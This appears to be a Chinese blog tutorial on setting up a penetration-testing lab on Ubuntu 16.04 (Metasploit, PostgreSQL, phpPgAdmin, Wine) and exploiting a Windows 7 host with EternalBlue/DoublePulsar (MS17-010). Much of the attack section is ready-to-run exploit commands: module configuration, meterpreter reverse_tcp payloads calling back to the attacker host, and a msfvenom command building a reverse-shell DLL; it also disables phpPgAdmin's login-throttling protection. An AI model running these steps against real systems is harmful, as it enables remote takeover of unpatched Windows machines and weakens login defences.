渗透环境
     分类:安全     有: 0 条评论

渗透环境

     分类:安全     有: 0 条评论

Ubuntu 16.04安装Metasploit

1.安装msf
打开终端,切换到root用户

cd /opt
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
vim msfinstall   #找到apt install -y --force-yes,把--force-yes删掉。
chmod 755 msfinstall
./msfinstall

等它自动安装完毕,然后先不要启动,目前最新版的这个msf会问你要不要用自带到database,你想用自带到数据库就回车,想用自己到数据库就输入no回车

2.安装数据库

apt-get install postgresql  
su - postgres                      
psql
alter user postgres with password 'new password';   #修改密码
\q

3.安装pgadmin,方便管理

apt-get install phppgadmin
# 会自动安装好apache2和php

登录页面应该就可以浏览了http://127.0.0.1/phppgadmin/
账户是:postgres 密码是你设置的密码。

失败次数太多限制登陆

vim /etc/phppgadmin/config.inc.php

# 找到$conf['extra_login_security'] = true;    #改成false即可。

4.启动Metasploit
切换到普通用户

msfconsole
y                 # 输入y连接postgresql数据库
                  # 一会儿之后就进入msf了
db_status         #检查数据库连接状态

Ubuntu 16.04安装、卸载Wine

安装wine

如果是64位系统则需要添加32位支持:

sudo dpkg --add-architecture i386 
# 添加wine最新的源
sudo add-apt-repository ppa:wine/wine-builds
sudo apt-get update
sudo apt-get install --install-recommends winehq-devel
# 安装完成后运行以下命令,会弹出窗口,安装插件。
wine cmd.exe

卸载wine

# 卸载wine主程序,在终端里输入:
sudo apt-get remove --purge wine
# 然后删除wine的目录文件:
rm -r ~/.wine
# 卸载残留不用的软件包:
sudo apt-get autoremove

Msf利用永恒之蓝模块

攻击机器 Ubuntu 16.04:192.168.0.205
靶机 win7 x64: 192.168.0.250

使用自定义的永恒之蓝模块

先安装wine;切换到你运行msf的账户,执行wine cmd.exe安装插件。

接下来安装模块

cd ~
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cd Eternalblue-Doublepulsar-Metasploit
# 拷贝模块到你msf的安装目录下
cp -r deps/ eternalblue_doublepulsar.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/
cd /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/
vim eternalblue_doublepulsar.rb
# 修改你的模块所在位置


修改好后,运行msf

msfcodsole
reload_all           #重新加载全部文件
search eternalblue   #搜索永恒之蓝模块
use exploit/windows/smb/eternalblue_doublepulsar    #使用模块


set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE  x64                        #设定系统位数
set rhost  192.168.0.250                           #设置被攻击IP
set payload windows/x64/meterpreter/reverse_tcp    #入侵成功后建立主动连接
set lhost 192.168.0.205
show options
# 基本设置好了,开始攻击
exploit

注意:

# 还可以设置DOUBLEPULSARPATH、ETERNALBLUEPATH、端口等等。

show targets    # 显示受影响的操作系统
set target 8    # 设置操作系统为列表中的第9个

# msfvenom是一个强大的命令,输出文件可以多种类型,帮助:msfvenom -h
# 如果权限不足,无法生成eternal11.dll,可自己指定位置生成,注意设置x86还是x64
msfvenom -p windows/meterpreter/reverse_tcp -e x64 lhost=192.168.0.205 lport=4444 -f dll -o /home/leo/.wine/drive_c/eternal11.dll

参考:
http://www.cnblogs.com/backlion/p/6804863.html
https://www.i0day.com/1173.html
https://wenku.baidu.com/view/6ce8e8cf27fff705cc1755270722192e453658b9.html


使用自带的永恒之蓝模块

Use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost 192.168.0.250
msf exploit(ms17_010_eternalblue) >set lhost 192.168.0.205
msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) >exploit
# 入侵成功
Meterpreter> sysinfo
(●゚ω゚●)